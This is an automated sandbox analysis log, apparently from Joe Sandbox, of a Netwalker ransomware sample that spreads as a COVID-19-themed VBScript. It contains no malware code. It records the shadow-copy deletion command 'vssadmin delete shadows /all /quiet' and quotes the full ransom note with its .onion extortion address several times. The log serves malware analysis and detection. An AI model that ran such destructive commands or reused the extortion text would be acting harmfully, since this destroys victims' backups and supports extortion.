Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Virustotal: Detection: 72% |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | ReversingLabs: Detection: 70% |
Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11% |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW, | 2_2_0040BFC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, | 2_2_0040D070 |
Source: qeSw.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r |
Source: qeSw.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# |
Source: qeSw.exe, 00000002.00000003.1385697170.0000000002774000.00000004.00000001.sdmp | String found in binary or memory: http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2 |
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1078628760.00000145A2104000.00000004.00000001.sdmp | String found in binary or memory: http://google.com |
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp | String found in binary or memory: http://google.comd |
Source: qeSw.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: qeSw.exe, 00000002.00000003.1157889492.0000000000861000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.mpv |
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.AutoItScript.com |
Source: qeSw.exe, 00000002.00000002.1482113404.0000000002A6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd |
Source: qeSw.exe, 00000002.00000003.1198828942.00000000029D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoit.de/index.php?page=Thread&postID=48393 |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com |
Source: qeSw.exe, 00000002.00000003.1444104805.000000000285F000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search&CODE=01 |
Source: qeSw.exe, 00000002.00000002.1483430813.0000000002CEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.crimsoneditor.com/ |
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix |
Source: qeSw.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0B |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp, E3495D-Readme.txt12.2.dr | String found in binary or memory: https://torproject.org/ |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: qeSw.exe, 00000002.00000003.1425223756.00000000027B9000.00000004.00000001.sdmp | Binary or memory string: _winapi_registerhotkey _winapi_registerpowersettingnotification _winapi_registerrawinputdevices \ | |
Source: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt | Dropped file: Hi!Your files are encrypted by Netwalker.All encrypted files for this computer has extension: .e3495d--If for some reason you read this text before the encryption ended,this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off,then we recommend that you move away from the computer and accept that you have been compromised.Rebooting/shutdown will cause you to lose files without the possibility of recovery.--Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program.Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.For us this is just business and to prove to you our seriousness, we will decrypt you one file for free.Just open our website, upload the encrypted file and get the decrypted file for free.--Steps to get access on our website:1.Download and install tor-browser: https://torproject.org/2.Open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.Put your personal code in the input form:{code_e3495d:VGBnzZ8UgmHbW6fuVJ0M9eiLVtjCc+ApVmrkZij+mGV4kA8mQdvB9+yISdG31/J1PojgSFiJre0xJFBFimFsOS28x/G/DfVz41ZjAtHP1KT1VQeqqDojoDx1cxD4NhGtmQHS6tJN3nzNpvbJ2fekS0vRR0T1XzwvGLfd0PMU1BMt2dSMGLkySf90vdYkCXTZTVZXv3/6N1cB8IDQPjtL9ijD42Z0yO8cHh6nF0Bru2OMqB7XCgd91Q9xwN8097CRFA3nL6Fl0RKpgJ3hO5rIOPOdmHmAS/6QYw==} |
Source: Yara match | File source: Process Memory Space: qeSw.exe PID: 244, type: MEMORY |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: vssadmin.exe, 00000003.00000002.1135051160.000002BDD1945000.00000004.00000040.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exedeleteshadows/all/quiet | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C: | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: vssadmin Delete Shadows | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D: | |
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exeC:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\vssadmin.exeWinSta0\Default | |
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Microsoft Office\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\ProgramData\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files\7-Zip\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Include\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Free Window Registry Repair\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Examples\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Adobe\Acrobat Reader DC\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Extras\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Examples\GUI\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt.chm entropy: 7.99637670441 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99565121131 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99580913438 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GDIPlus.au3 entropy: 7.99334234588 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\AppXManifest.xml entropy: 7.99508004778 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiListView.au3 entropy: 7.99536700031 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3 entropy: 7.99631912699 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\ie.au3 entropy: 7.99586892518 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99666218983 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Date.au3 entropy: 7.99525208127 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties entropy: 7.99546197118 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiTreeView.au3 entropy: 7.99524549325 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Array.au3 entropy: 7.99563928777 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\APIErrorsConstants.au3 entropy: 7.99595363557 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiToolbar.au3 entropy: 7.99483060331 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Misc.au3 entropy: 7.99003480004 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\NetShare.au3 entropy: 7.99079701727 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiRichEdit.au3 entropy: 7.99537140624 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3 entropy: 7.99538566422 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\NTSTATUSConstants.au3 entropy: 7.99680981932 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS entropy: 7.99487655592 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM entropy: 7.99271754146 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3 entropy: 7.99538437408 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3 entropy: 7.99033845378 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3 entropy: 7.9900245833 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml entropy: 7.99039775943 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm entropy: 7.99571471216 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DC10 NtSetInformationFile, | 2_2_0040DC10 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DCD0 NtSetInformationFile, | 2_2_0040DCD0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040E8B0 NtDuplicateObject,NtClose,NtClose, | 2_2_0040E8B0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D310 NtQuerySystemInformation, | 2_2_0040D310 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040EBC0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 2_2_0040EBC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00407820 | 2_2_00407820 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405A90 | 2_2_00405A90 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405950 | 2_2_00405950 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B560 | 2_2_0040B560 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AF70 | 2_2_0040AF70 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AB00 | 2_2_0040AB00 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B180 | 2_2_0040B180 |
Source: CORONAVIRUS_COVID-19.vbs | Initial sample: Strings found which are bigger than 50 |
Source: qeSw.exe, 00000002.00000002.1480282014.000000000252A000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files (x86)\autoit3\AutoItX\Examples\C++\utoItX.sln |
Source: classification engine | Classification label: mal100.rans.spre.evad.winVBS@6/226@0/0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D5E0 LookupPrivilegeValueW,AdjustTokenPrivileges, | 2_2_0040D5E0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_01 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs' |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System information queried: HandleInformation |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11% |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs' | |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe | |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Directory created: C:\Program Files\7-Zip\E3495D-Readme.txt |
Source: | Binary string: SecurityHealthAgent.pdbHeal source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscApi.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscsvc.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: shellext.pdbhServic source: qeSw.exe, 00000002.00000002.1483380682.0000000002CCA000.00000004.00000001.sdmp |
Source: | Binary string: WscApi.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscui.pdbdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthService.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscIsvIf.pdbityCent source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: shellext.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: WscIsvIf.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthSSO.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
